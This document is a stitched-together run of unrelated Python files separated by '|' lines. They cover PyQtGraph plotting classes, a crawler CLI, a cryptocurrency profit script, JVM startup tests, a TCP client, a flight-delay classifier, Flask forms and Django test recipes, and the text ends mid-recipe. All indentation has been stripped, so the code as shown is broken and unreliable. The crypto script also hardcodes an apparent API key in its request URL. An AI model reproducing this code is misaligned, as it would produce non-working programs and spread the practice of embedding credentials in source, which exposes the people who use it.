def _default_y_axis(self):
y_axis = pg.AxisItem('left')
y_axis.setLabel(self.label)
y_axis.linkToView(self.viewbox)
y_axis.setGrid(64)
return y_axis
def _default_viewbox(self):
viewbox = pg.ViewBox(enableMenu=False)
viewbox.setMouseEnabled(x=False, y=True)
viewbox.setBackgroundColor('w')
if (self.y_min != 0) or (self.y_max != 0):
viewbox.disableAutoRange()
viewbox.setYRange(self.y_min, self.y_max)
for child in self.children:
for plot in child.get_plots():
viewbox.addItem(plot)
return viewbox
def update(self, event=None):
for child in self.children:
child.update()
def add_plot(self, plot, label=None):
self.viewbox.addItem(plot)
if label:
self.parent.legend.addItem(plot, label)
def plot(self, x, y, color='k', log_x=False, log_y=False, label=None,
kind='line'):
'''
Convenience function used by plugins
This is typically used in post-processing routines to add static plots
to existing view boxes.
'''
if log_x:
x = np.log10(x)
if log_y:
y = np.log10(y)
x = np.asarray(x)
y = np.asarray(y)
m = np.isfinite(x) & np.isfinite(y)
x = x[m]
y = y[m]
if kind == 'line':
item = pg.PlotCurveItem(pen=pg.mkPen(color))
elif kind == 'scatter':
item = pg.ScatterPlotItem(pen=pg.mkPen(color))
item.setData(x, y)
self.add_plot(item)
if label is not None:
self.parent.legend.addItem(item, label)
################################################################################
# Plots
################################################################################
class BasePlot(PSIContribution):
# Make this weak-referenceable so we can bind methods to Qt slots.
__slots__ = '__weakref__'
source_name = d_(Unicode())
source = Typed(object)
label = d_(Unicode())
def update(self, event=None):
pass
def _reset_plots(self):
pass
################################################################################
# Single plots
################################################################################
class SinglePlot(BasePlot):
pen_color = d_(Typed(object))
pen_width = d_(Float(0))
antialias = d_(Bool(False))
label = d_(Unicode())
pen = Typed(object)
plot = Typed(object)
def get_plots(self):
return [self.plot]
def _default_pen_color(self):
return 'black'
def _default_pen(self):
color = make_color(self.pen_color)
return pg.mkPen(color, width=self.pen_width)
def _default_name(self):
return self.source_name + '_plot'
class ChannelPlot(SinglePlot):
downsample = Int(0)
decimate_mode = d_(Enum('extremes', 'mean'))
_cached_time = Typed(np.ndarray)
_buffer = Typed(SignalBuffer)
def _default_name(self):
return self.source_name + '_channel_plot'
def _default_plot(self):
return pg.PlotCurveItem(pen=self.pen, antialias=self.antialias)
def _observe_source(self, event):
if self.source is not None:
self.parent.data_range.add_source(self.source)
self.parent.data_range.observe('span', self._update_time)
self.source.add_callback(self._append_data)
self.parent.viewbox.sigResized.connect(self._update_decimation)
self._update_time(None)
self._update_decimation(self.parent.viewbox)
def _update_time(self, event):
# Precompute the time array since this can be the "slow" point
# sometimes in computations
n = round(self.parent.data_range.span*self.source.fs)
self._cached_time = np.arange(n)/self.source.fs
self._update_decimation()
self._update_buffer()
def _update_buffer(self, event=None):
self._buffer = SignalBuffer(self.source.fs,
self.parent.data_range.span*2)
def _update_decimation(self, viewbox=None):
try:
width, _ = self.parent.viewbox.viewPixelSize()
dt = self.source.fs**-1
self.downsample = round(width/dt/2)
except Exception as e:
pass
def _append_data(self, data):
self._buffer.append_data(data)
self.update()
def update(self, event=None):
low, high = self.parent.data_range.current_range
data = self._buffer.get_range_filled(low, high, np.nan)
t = self._cached_time[:len(data)] + low
if self.downsample > 1:
t = t[::self.downsample]
if self.decimate_mode == 'extremes':
d_min, d_max = decimate_extremes(data, self.downsample)
t = t[:len(d_min)]
x = np.c_[t, t].ravel()
y = np.c_[d_min, d_max].ravel()
if x.shape == y.shape:
deferred_call(self.plot.setData, x, y, connect='pairs')
elif self.decimate_mode == 'mean':
d = decimate_mean(data, self.downsample)
t = t[:len(d)]
if t.shape == d.shape:
deferred_call(self.plot.setData, t, d)
else:
t = t[:len(data)]
deferred_call(self.plot.setData, t, data)
def _reshape_for_decimate(data, downsample):
# Determine the "fragment" size that we are unable to decimate. A
# downsampling factor of 5 means that we perform the operation in chunks of
# 5 samples. If we have only 13 samples of data, then we cannot decimate
# the last 3 samples and will simply discard them.
last_dim = data.ndim
offset = data.shape[-1] % downsample
if offset > 0:
data = data[..., :-offset]
shape = (len(data), -1, downsample) if data.ndim == 2 else (-1, downsample)
return data.reshape(shape)
def decimate_mean(data, downsample):
# If data is empty, return imediately
if data.size == 0:
return np.array([]), np.array([])
data = _reshape_for_decimate(data, downsample).copy()
return data.mean(axis=-1)
def decimate_extremes(data, downsample):
# If data is empty, return imediately
if data.size == 0:
return np.array([]), np.array([])
# Force a copy to be made, which speeds up min()/max(). Apparently min/max
# make a copy of a reshaped array before performing the operation, so we
# force it now so the copy only occurs once.
data = _reshape_for_decimate(data, downsample).copy()
return data.min(axis=-1), data.max(axis=-1)
class FFTChannelPlot(ChannelPlot):
time_span = d_(Float(1))
window = d_(Enum('hamming', 'flattop'))
_x = Typed(np.ndarray)
_buffer = Typed(SignalBuffer)
def _default_name(self):
return self.source_name + '_fft_plot'
def _observe_source(self, event):
if self.source is not None:
self.source.add_callback(self._append_data)
self.source.observe('fs', self._cache_x)
self._update_buffer()
self._cache_x()
def _update_buffer(self, event=None):
self._buffer = SignalBuffer(self.source.fs, self.time_span)
def _append_data(self, data):
self._buffer.append_data(data)
self.update()
def _cache_x(self, event=None):
if self.source.fs:
self._x = get_x_fft(self.source.fs, self.time_span)
def update(self, event=None):
if self._buffer.get_time_ub() >= self.time_span:
data = self._buffer.get_latest(-self.time_span, 0)
#psd = util.patodb(util.psd(data, self.source.fs, self.window))
psd = util.psd(data, self.source.fs, self.window)
spl = self.source.calibration.get_spl(self._x, psd)
deferred_call(self.plot.setData, self._x, spl)
class BaseTimeseriesPlot(SinglePlot):
rect_center = d_(Float(0.5))
rect_height = d_(Float(1))
fill_color = d_(Typed(object))
brush = Typed(object)
_rising = Typed(list, ())
_falling = Typed(list, ())
def _default_brush(self):
return pg.mkBrush(self.fill_color)
def _default_plot(self):
plot = pg.QtGui.QGraphicsPathItem()
plot.setPen(self.pen)
plot.setBrush(self.brush)
return plot
def update(self, event=None):
lb, ub = self.parent.data_range.current_range
current_time = self.parent.data_range.current_time
starts = self._rising
ends = self._falling
if len(starts) == 0 and len(ends) == 1:
starts = [0]
elif len(starts) == 1 and len(ends) == 0:
ends = [current_time]
elif len(starts) > 0 and len(ends) > 0:
if starts[0] > ends[0]:
starts = np.r_[0, starts]
if starts[-1] > ends[-1]:
ends = np.r_[ends, current_time]
try:
epochs = np.c_[starts, ends]
except ValueError as e:
log.exception(e)
log.warning('Unable to update %r, starts shape %r, ends shape %r',
self, starts, ends)
return
m = ((epochs >= lb) & (epochs < ub)) | np.isnan(epochs)
epochs = epochs[m.any(axis=-1)]
path = pg.QtGui.QPainterPath()
y_start = self.rect_center - self.rect_height*0.5
for x_start, x_end in epochs:
x_width = x_end-x_start
r = pg.QtCore.QRectF(x_start, y_start, x_width, self.rect_height)
path.addRect(r)
deferred_call(self.plot.setPath, path)
class EventPlot(BaseTimeseriesPlot):
event = d_(Unicode())
def _observe_event(self, event):
if self.event is not None:
self.parent.data_range.observe('current_time', self.update)
def _default_name(self):
return self.event + '_timeseries'
def _append_data(self, bound, timestamp):
if bound == 'start':
self._rising.append(timestamp)
elif bound == 'end':
self._falling.append(timestamp)
self.update()
class TimeseriesPlot(BaseTimeseriesPlot):
source_name = d_(Unicode())
source = Typed(object)
def _default_name(self):
return self.source_name + '_timeseries'
def _observe_source(self, event):
if self.source is not None:
self.parent.data_range.add_event_source(self.source)
self.parent.data_range.observe('current_time', self.update)
self.source.add_callback(self._append_data)
def _append_data(self, data):
for (etype, value) in data:
if etype == 'rising':
self._rising.append(value)
elif etype == 'falling':
self._falling.append(value)
################################################################################
# Group plots
################################################################################
class GroupMixin(ColorCycleMixin):
source = Typed(object)
group_meta = d_(Unicode())
groups = d_(Typed(ContextMeta))
group_names = d_(List())
#: Function that takes the epoch metadata and decides whether to accept it
#: for plotting. Useful to reduce the number of plots shown on a graph.
group_filter = d_(Callable())
#: Function that takes the epoch metadata and returns a key indicating
#: which group it should included in for plotting.
group_color_key = d_(Callable())
pen_width = d_(Int(0))
antialias = d_(Bool(False))
plots = Dict()
_data_cache = Typed(object)
_data_count = Typed(object)
_data_updated = Typed(object)
_data_n_samples = Typed(object)
_pen_color_cycle = Typed(object)
_plot_colors = Typed(object)
_x = Typed(np.ndarray)
n_update = d_(Int(1))
def _default_group_names(self):
return [p.name for p in self.groups.values]
def _default_group_filter(self):
return lambda key: True
def _default_group_color_key(self):
return lambda key: tuple(key[g] for g in self.group_names)
def get_pen_color(self, key):
kw_key = {n: k for n, k in zip(self.group_names, key)}
group_key = self.group_color_key(kw_key)
return super().get_pen_color(group_key)
def reset_plots(self):
# Clear any existing plots and reset color cycle
for plot in self.plots.items():
self.parent.viewbox.removeItem(plot)
self.plots = {}
self._data_cache = defaultdict(list)
self._data_count = defaultdict(int)
self._data_updated = defaultdict(int)
self._data_n_samples = defaultdict(int)
def _observe_groups(self, event):
self.groups.observe('values', self._update_groups)
self._update_groups()
def _update_groups(self, event=None):
self.reset_plots()
self.group_names = [p.name for p in self.groups.values]
if self.source is not None:
self.update()
def get_plots(self):
return []
def _make_new_plot(self, key):
log.info('Adding plot for key %r', key)
try:
pen_color = self.get_pen_color(key)
pen = pg.mkPen(pen_color, width=self.pen_width)
plot = pg.PlotCurveItem(pen=pen, antialias=self.antialias)
deferred_call(self.parent.viewbox.addItem, plot)
self.plots[key] = plot
except KeyError as key_error:
key = key_error.args[0]
m = f'Cannot update plot since a field, {key}, ' \
'required by the plot is missing.'
raise ConfigurationException(m) from key_error
def get_plot(self, key):
if key not in self.plots:
self._make_new_plot(key)
return self.plots[key]
class EpochGroupMixin(GroupMixin):
duration = Float()
def _y(self, epoch):
return np.mean(epoch, axis=0) if len(epoch) \
else np.full_like(self._x, np.nan)
def _update_duration(self, event=None):
self.duration = self.source.duration
def _epochs_acquired(self, epochs):
for d in epochs:
md = d['info']['metadata']
if self.group_filter(md):
signal = d['signal']
key = tuple(md[n] for n in self.group_names)
self._data_cache[key].append(signal)
self._data_count[key] += 1
# Track number of samples
n = max(self._data_n_samples[key], len(signal))
self._data_n_samples[key] = n
# Does at least one epoch need to be updated?
for key, count in self._data_count.items():
if count >= self._data_updated[key] + self.n_update:
n = max(self._data_n_samples.values())
self.duration = n / self.source.fs
self.update()
break
def _observe_source(self, event):
if self.source is not None:
self.source.add_callback(self._epochs_acquired)
self.source.observe('duration', self._update_duration)
self.source.observe('fs', self._cache_x)
self.observe('duration', self._cache_x)
self._reset_plots()
self._cache_x()
def update(self, event=None):
# Update epochs that need updating
todo = []
for key, count in list(self._data_count.items()):
if count >= self._data_updated[key] + self.n_update:
data = self._data_cache[key]
plot = self.get_plot(key)
y = self._y(data)
todo.append((plot.setData, self._x, y))
self._data_updated[key] = len(data)
def update():
for setter, x, y in todo:
setter(x, y)
deferred_call(update)
class GroupedEpochAveragePlot(EpochGroupMixin, BasePlot):
def _cache_x(self, event=None):
# Set up the new time axis
if self.source.fs and self.duration:
n_time = round(self.source.fs * self.duration)
self._x = np.arange(n_time)/self.source.fs
def _default_name(self):
return self.source_name + '_grouped_epoch_average_plot'
def _observe_source(self, event):
super()._observe_source(event)
if self.source is not None:
self.parent.data_range.add_source(self.source)
class GroupedEpochFFTPlot(EpochGroupMixin, BasePlot):
def _default_name(self):
return self.source_name + '_grouped_epoch_fft_plot'
def _cache_x(self, event=None):
# Cache the frequency points. Must be in units of log for PyQtGraph.
# TODO: This could be a utility function stored in the parent?
if self.source.fs and self.duration:
self._x = get_x_fft(self.source.fs, self.duration)
def _y(self, epoch):
y = np.mean(epoch, axis=0) if epoch else np.full_like(self._x, np.nan)
return self.source.calibration.get_spl(self._x, util.psd(y, self.source.fs))
class GroupedEpochPhasePlot(EpochGroupMixin, BasePlot):
unwrap = d_(Bool(True))
def _default_name(self):
return self.source_name + '_grouped_epoch_phase_plot'
def _cache_x(self, event=None):
# Cache the frequency points. Must be in units of log for PyQtGraph.
# TODO: This could be a utility function stored in the parent?
if self.source.fs and self.duration:
self._x = get_x_fft(self.source.fs, self.duration)
def _y(self, epoch):
y = np.mean(epoch, axis=0) if epoch else np.full_like(self._x, np.nan)
return util.phase(y, self.source.fs, unwrap=self.unwrap)
class StackedEpochAveragePlot(EpochGroupMixin, BasePlot):
_offset_update_needed = Bool(False)
def _make_new_plot(self, key):
super()._make_new_plot(key)
self._offset_update_needed = True
def _update_offsets(self, vb=None):
vb = self.parent.viewbox
height = vb.height()
n = len(self.plots)
for i, (_, plot) in enumerate(sorted(self.plots.items())):
offset = (i+1) * height / (n+1)
point = vb.mapToView(pg.Point(0, offset))
plot.setPos(0, point.y())
def _cache_x(self, event=None):
# Set up the new time axis
if self.source.fs and self.source.duration:
n_time = round(self.source.fs * self.source.duration)
self._x = np.arange(n_time)/self.source.fs
def update(self):
super().update()
if self._offset_update_needed:
deferred_call(self._update_offsets)
self._offset_update_needed = False
def _reset_plots(self):
#super()._reset_plots()
self.parent.viewbox \
.sigRangeChanged.connect(self._update_offsets)
self.parent.viewbox \
.sigRangeChangedManually.connect(self._update_offsets)
################################################################################
# Simple plotters
################################################################################
class ResultPlot(SinglePlot):
x_column = d_(Unicode())
y_column = d_(Unicode())
average = d_(Bool())
SYMBOL_MAP = {
'circle': 'o',
'square': 's',
'triangle': 't',
'diamond': 'd',
}
symbol = d_(Enum('circle', 'square', 'triangle', 'diamond'))
symbol_size = d_(Float(10))
symbol_size_unit = d_(Enum('screen', 'data'))
data_filter = d_(Callable())
_data_cache = Typed(list)
def _default_data_filter(self):
# By default, accept all data points
return lambda x: True
def _default_name(self):
return '.'.join((self.parent.name, self.source_name, 'result_plot',
self.x_column, self.y_column))
def _observe_source(self, event):
if self.source is not None:
self._data_cache = []
self.source.add_callback(self._data_acquired)
def _data_acquired(self, data):
update = False
for d in data:
if self.data_filter(d):
x = d[self.x_column]
y = d[self.y_column]
self._data_cache.append((x, y))
update = True
if update:
self.update()
def update(self, event=None):
if not self._data_cache:
return
x, y = zip(*self._data_cache)
x = np.array(x)
y = np.array(y)
if self.average:
d = pd.DataFrame({'x': x, 'y': y}).groupby('x')['y'].mean()
x = d.index.values
y = d.values
deferred_call(self.plot.setData, x, y)
def _default_plot(self):
symbol_code = self.SYMBOL_MAP[self.symbol]
color = QColor(self.pen_color)
pen = pg.mkPen(color, width=self.pen_width)
brush = pg.mkBrush(color)
plot = pg.PlotDataItem(pen=pen,
antialias=self.antialias,
symbol=symbol_code,
symbolSize=self.symbol_size,
symbolPen=pen,
symbolBrush=brush,
pxMode=self.symbol_size_unit=='screen')
deferred_call(self.parent.add_plot, plot, self.label)
return plot
class DataFramePlot(ColorCycleMixin, PSIContribution):
data = d_(Typed(pd.DataFrame))
x_column = d_(Unicode())
y_column = d_(Unicode())
grouping = d_(List(Unicode()))
_plot_cache = Dict()
SYMBOL_MAP = {
'circle': 'o',
'square': 's',
'triangle': 't',
'diamond': 'd',
}
symbol = d_(Enum('circle', 'square', 'triangle', 'diamond'))
symbol_size = d_(Float(10))
symbol_size_unit = d_(Enum('screen', 'data'))
pen_width = d_(Float(0))
antialias = d_(Bool(False))
def _default_name(self):
return '.'.join((self.parent.name, 'result_plot'))
def _observe_x_column(self, event):
self.reset_plots()
self._observe_data(event)
def _observe_y_column(self, event):
self.reset_plots()
self._observe_data(event)
def _observe_grouping(self, event):
self.reset_plots()
self._observe_data(event)
def _observe_data(self, event):
if self.data is None:
return
if self.x_column not in self.data:
return
if self.y_column not in self.data:
return
todo = []
if self.grouping:
try:
for group, values in self.data.groupby(self.grouping):
if group not in self._plot_cache:
self._plot_cache[group] = self._default_plot(group)
x = values[self.x_column].values
y = values[self.y_column].values
i = np.argsort(x)
todo.append((self._plot_cache[group], x[i], y[i]))
except KeyError as e:
# This is likely triggered when grouping updates an analysis
# before it's ready.
log.warning(e)
return
else:
if None not in self._plot_cache:
self._plot_cache[None] = self._default_plot(None)
x = self.data[self.x_column].values
y = self.data[self.y_column].values
i = np.argsort(x)
todo.append((self._plot_cache[None], x[i], y[i]))
def update():
nonlocal todo
for plot, x, y in todo:
plot.setData(x, y)
deferred_call(update)
def _default_plot(self, group):
symbol_code = self.SYMBOL_MAP[self.symbol]
color = self.get_pen_color(group)
brush = pg.mkBrush(color)
pen = pg.mkPen(color, width=self.pen_width)
plot = pg.PlotDataItem(pen=pen,
antialias=self.antialias,
symbol=symbol_code,
symbolSize=self.symbol_size,
symbolPen=pen,
symbolBrush=brush,
pxMode=self.symbol_size_unit=='screen')
deferred_call(self.parent.add_plot, plot, self.label)
return plot
def reset_plots(self):
for plot in self._plot_cache.values():
deferred_call(self.parent.viewbox.removeItem, plot)
self._plot_cache = {}
def get_plots(self):
return list(self._plot_cache.values())
|
#!/usr/bin/env python
import click
from lib.python.stream_crawler.stream_crawler import StreamCrawler
class BloodhoundCLI:
@click.group()
def bloodhound_cli():
pass
@bloodhound_cli.command()
@click.option('--site', type=click.Choice(['youtube', 'twitch']), required=True)
def crawl(site):
StreamCrawler.run(site)
|
import requests
import json
api_request = requests.get("https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit=5&convert=USD&CMC_PRO_API_KEY=3889ce63-c733-403d-8b7d-c41a2438b4ea")
api = json.loads(api_request.content)
print("----------------")
print("----------------")
coins = [
{
"symbol":"BTC",
"amount_owned": 2,
"price_per_coin": 3200
},
{
"symbol":"EOS",
"amount_owned": 100,
"price_per_coin": 2.05
}
]
total_pl = 0
for i in range(0, 5):
for coin in coins:
if api["data"][i]["symbol"] == coin["symbol"]:
total_paid = coin["amount_owned"] * coin["price_per_coin"]
current_value = coin["amount_owned"] * api["data"][i]["quote"]["USD"]["price"]
pl_percoin = api["data"][i]["quote"]["USD"]["price"] - coin["price_per_coin"]
total_pl_coin = pl_percoin * coin["amount_owned"]
total_pl = total_pl + total_pl_coin
print(api["data"][i]["name"] + " - " + api["data"][i]["symbol"])
print("Price - ${0:.2f}".format(api["data"][i]["quote"]["USD"]["price"]))
print("Number Of Coin:", coin["amount_owned"])
print("Total Amount Paid:", "${0:.2f}".format(total_paid))
print("Current Value:", "${0:.2f}".format(current_value))
print("P/L Per Coin:", "${0:.2f}".format(pl_percoin))
print("Total P/L With Coin:", "${0:.2f}".format(total_pl_coin))
print("----------------")
print("Total P/L For Portfolio:", "${0:.2f}".format(total_pl))
|
import math
a,b=raw_input().split()
x=float(a)
y=float(b)
print round(math.sqrt(x*x+y*y),1)
print round(x*y/2,1)
|
from flask import Blueprint
courses = Blueprint('courses',__name__,url_prefix='/courses')
from app.courses import routes |
import time
initial = time.time()
#print(initial)
k = 0
while(k<10):
print("This is sandy program")
time.sleep(2)
k+=1
print("while loop execution time: ", time.time() - initial, "Seconds")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 13:54:26 2020
@author: petrapoklukar
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import app
from absl import flags
import sys
sys.path.append('..')
from disentanglement_lib.preprocessing import preprocess
from disentanglement_lib.methods.unsupervised import pca
FLAGS = flags.FLAGS
flags.DEFINE_string("dataset", None, "dataset to use")
flags.DEFINE_boolean("overwrite", False,
"Whether to overwrite output directory.")
flags.DEFINE_integer("rng", 0,
"random seed")
def main_per_model(unused_argv):
base_path = "backbone"
model_path = os.path.join(base_path, "pca")
if not os.path.exists(model_path):
os.makedirs(model_path)
print("\n\n*- Preprocessing '%s' \n\n" %(FLAGS.dataset))
preproces_gin_bindings = [
"dataset.name = '%s'" %(FLAGS.dataset),
"preprocess.preprocess_fn = @split_train_and_validation",
"split_train_and_validation.random_seed = %d" %(FLAGS.rng)
]
preprocess.preprocess_with_gin(FLAGS.dataset,
"dummy_name",
overwrite=FLAGS.overwrite,
gin_config_files=None,
gin_bindings=preproces_gin_bindings)
print("\n\n*- Preprocessing DONE \n\n")
print("\n\n*- Training PCA.")
gin_bindings = [
"dataset.name = '%s'" %(FLAGS.dataset + '_' + str(FLAGS.rng)),
"train_pca.random_seed = 0",
"train_pca.num_pca_components = [10, 30]",#[100, 500, 1000, 2000, 4000]",
]
pca.train_pca_with_gin(
model_path, FLAGS.overwrite, gin_bindings=gin_bindings)
preprocess.destroy_train_and_validation_splits(
FLAGS.dataset + '_' + str(FLAGS.rng))
print("\n\n*- Training COMPLETED \n\n")
def main_per_dataset(unused_argv):
base_path = "backbone"
model_path = os.path.join(base_path, "pca")
if not os.path.exists(model_path):
os.makedirs(model_path)
print("\n\n*- Training PCA.")
gin_bindings = [
"dataset.name = '%s'" %(FLAGS.dataset),
"train_pca.random_seed = 0",
"train_pca.num_pca_components = [10000]", #[100, 500, 1000, 2000, 4000]",
]
pca.train_pca_with_gin(
model_path, FLAGS.overwrite, gin_bindings=gin_bindings)
print("\n\n*- Training COMPLETED \n\n")
def create_pca_holdout_split(unused_argv):
print("\n\n*- Preprocessing '%s' \n\n" %(FLAGS.dataset))
preproces_gin_bindings = [
"dataset.name = '%s'" %(FLAGS.dataset),
"preprocess.preprocess_fn = @pca_split_holdout",
"pca_split_holdout.random_seed = 0",
"pca_split_holdout.split_size = 5000"
]
preprocess.preprocess_with_gin(FLAGS.dataset,
"dummy_name",
overwrite=FLAGS.overwrite,
gin_config_files=None,
gin_bindings=preproces_gin_bindings)
print("\n\n*- Preprocessing DONE \n\n")
if __name__ == "__main__":
# app.run(create_pca_holdout_split)
app.run(main_per_dataset)
|
# *****************************************************************************
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See NOTICE file for details.
#
# *****************************************************************************
import jpype
import common
import subrun
import os
import sys
import unittest
def runStartJVM(*args, **kwargs):
jpype.startJVM(*args, **kwargs)
def runStartJVMTest(*args, **kwargs):
jpype.startJVM(*args, **kwargs)
try:
jclass = jpype.JClass('jpype.array.TestArray')
return
except:
pass
raise RuntimeError("Test class not found")
root = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
cp = os.path.join(root, 'classes').replace('\\', '/')
@subrun.TestCase(individual=True)
class StartJVMCase(unittest.TestCase):
def setUp(self):
self.jvmpath = jpype.getDefaultJVMPath()
def testStartup(self):
with self.assertRaises(OSError):
jpype.startJVM(convertStrings=False)
jpype.startJVM(convertStrings=False)
def testRestart(self):
with self.assertRaises(OSError):
jpype.startJVM(convertStrings=False)
jpype.shutdownJVM()
jpype.startJVM(convertStrings=False)
def testJVMPathKeyword(self):
runStartJVM(jvmpath=self.jvmpath)
def testInvalidArgsFalse(self):
with self.assertRaises(RuntimeError):
runStartJVM("-for_sure_InVaLiD",
ignoreUnrecognized=False, convertStrings=False)
def testInvalidArgsTrue(self):
runStartJVM("-for_sure_InVaLiD",
ignoreUnrecognized=True, convertStrings=False)
def testClasspathArgKeyword(self):
runStartJVMTest(classpath=cp, convertStrings=False)
def testClasspathArgList(self):
runStartJVMTest(classpath=[cp], convertStrings=False)
def testClasspathArgListEmpty(self):
runStartJVMTest(classpath=[cp, ''], convertStrings=False)
def testClasspathArgDef(self):
runStartJVMTest('-Djava.class.path=%s' % cp, convertStrings=False)
def testClasspathTwice(self):
with self.assertRaises(TypeError):
runStartJVMTest('-Djava.class.path=%s' %
cp, classpath=cp, convertStrings=False)
def testClasspathBadType(self):
with self.assertRaises(TypeError):
runStartJVMTest(classpath=1, convertStrings=False)
def testPathArg(self):
runStartJVMTest(self.jvmpath, classpath=cp, convertStrings=False)
def testPathKeyword(self):
path = jpype.getDefaultJVMPath()
runStartJVMTest(classpath=cp, jvmpath=self.jvmpath,
convertStrings=False)
def testPathTwice(self):
with self.assertRaises(TypeError):
jpype.startJVM(self.jvmpath, jvmpath=self.jvmpath)
def testBadKeyword(self):
with self.assertRaises(TypeError):
jpype.startJVM(invalid=True)
|
from socket import socket, AF_INET, SOCK_STREAM
class TCPClient():
def __init__(self, ip, port, bufsize=1024):
self.ip = ip
self.port = port
self.bufsize = bufsize
self.client = socket(AF_INET, SOCK_STREAM)
self.RUN = True
def start(self):
self.client.connect((self.ip, self.port))
def send(self, data):
self.client.send(data)
def recv(self):
return self.client.recv(self.bufsize)
def close(self):
self.client.close() |
import warnings
warnings.filterwarnings('ignore')
import sys
import random
import numpy as np
from sklearn import linear_model, cross_validation, metrics, svm
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support, accuracy_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
import pydoop.hdfs as hdfs
def read_csv_from_hdfs(path, cols, col_types=None):
files = hdfs.ls(path);
pieces = []
for f in files:
fhandle = hdfs.open(f)
pieces.append(pd.read_csv(fhandle, names=cols, dtype=col_types))
fhandle.close()
return pd.concat(pieces, ignore_index=True)
# read files
cols = ['delay', 'month', 'day', 'dow', 'hour', 'distance', 'carrier', 'dest', 'days_from_holiday']
col_types = {'delay': int, 'month': int, 'day': int, 'dow': int, 'hour': int, 'distance': int,
'carrier': str, 'dest': str, 'days_from_holiday': int}
data_2014 = read_csv_from_hdfs('/home/paven/Bigdata/Project/Data_2014', cols, col_types)
data_2015 = read_csv_from_hdfs('/home/paven/Bigdata/Project/Data_2015', cols, col_types)
# Create training set and test set
cols = ['month', 'day', 'dow', 'hour', 'distance', 'days_from_holiday']
train_y = data_2014['delay'] >= 15
train_x = data_2014[cols]
test_y = data_2015['delay'] >= 15
test_x = data_2015[cols]
print train_x.shape
from sklearn.ensemble import ExtraTreesClassifier
# Create Random Forest classifier with 50 trees
clf_etc = ExtraTreesClassifier(n_estimators=50, max_depth=None, min_samples_split=1, random_state=0, n_jobs=-1)
clf_etc.fit(train_x, train_y)
# Evaluate on test set
pr = clf_etc.predict(test_x)
# print results
cm = confusion_matrix(test_y, pr)
print "<------- ExtraTreesClassifier -------->"
print "Confusion matrix:"
print pd.DataFrame(cm)
report_svm = precision_recall_fscore_support(list(test_y), list(pr), average='binary')
print "\n[-] Precision = %0.2f\n[-] Recall = %0.2f\n[-] F1 score = %0.2f\n[-] Accuracy = %0.2f" % \
(report_svm[0], report_svm[1], report_svm[2], accuracy_score(list(test_y), list(pr)))
print "<-------------------------------------->\n"
|
import numpy as np
class FaceData:
def __init__(self):
self.detection_data = self.DetectionData()
self.recognition_data = self.RecognitionData()
self.results_data = self.ResultData()
class DetectionData():
def __init__(self):
self.tracker_ids = np.asarray([])
self.bbs = np.asarray([])
self.scores = np.asarray([])
self.score_thresh = 0.0
class RecognitionData():
def __init__(self):
self.score_thresh = 0.0
self.scores = np.asarray([])
self.persons = np.asarray([])
self.tracker_ids = []
class ResultData:
def __init__(self):
self.bbs = []
self.persons = []
self.scores = []
class ImageData:
def __init__(self):
self.TYPE = 'Webcam'
self.image_np = ()
self.isInit = False
self.width = None
self.height = None
|
def gree(name):
print(f"hello {name}")
'''
we have to types of functions
1. preform a task (e.g., greet and print are functions which are preforming a task)
2. return a value (e.g., round(1.9) is a function which returns a value)
if put a print(preform a task fucntion) the result will be NONE
but, if put a print(return a value function), it will return a value to us
'''
# this is type of return value
def get_greet(name):
return f"{name}"
message = get_greet('Amir')
file = open('content.txt', 'w')
file.open(message)
|
from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField
from wtforms import validators
from wtforms.fields.core import BooleanField
from wtforms.validators import InputRequired, Optional, URL
class AddPetForm(FlaskForm):
'''Form for adding a new furry little friend, or maybe a reptile friend too!'''
name = StringField("Pet Name", validators=[InputRequired()])
species = StringField("Pet Species", validators=[InputRequired()])
photo_url = StringField("Pet Photo (online link)", validators=[InputRequired(), URL()])
age = IntegerField("Age", validators=[InputRequired()])
notes = StringField("Pet Bio", validators=[Optional(), Optional()])
available = BooleanField("Available?")
class EditPetForm(FlaskForm):
'''Form for editing pet info'''
photo_url = StringField("Pet Photo (online link)", validators = [InputRequired(), URL()])
notes = StringField("Pet Bio", validators=[Optional(), Optional()])
available = BooleanField("Available?") |
from datetime import datetime
from model_mommy.recipe import Recipe
from django.contrib.gis.geos import Point, Polygon
from catamidb.models import AUVDeployment, DOVDeployment, BRUVDeployment, TVDeployment, TIDeployment, Pose
pose1 = Recipe(
Pose,
position=Point(12.4604, 43.9420),
depth=27.5,
date_time=datetime.now()
)
pose2 = Recipe(
Pose,
position=Point(12.4604, 43.9420),
depth=27.5,
date_time=datetime.now()
)
pose3 = Recipe(
Pose,
position=Point(12.4604, 43.9420),
depth=27.5,
date_time=datetime.now()
)
auvdeployment1 = Recipe(
AUVDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
auvdeployment2 = Recipe(
AUVDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
auvdeployment = Recipe(
AUVDeployment,
start_position=Point(12.4604, 43.9420),
end_position=Point(12.4604, 43.9420),
start_time_stamp=datetime.now(),
end_time_stamp=datetime.now(),
min_depth=10.0,
max_depth=50.0,
transect_shape=Polygon(((0.0, 0.0),
(0.0, 50.0),
(50.0, 50.0),
(50.0, 0.0),
(0.0, 0.0)))
)
dovdeployment = Recipe(
DOVDeployment,
start_position=Point(12.4604, 43.9420),
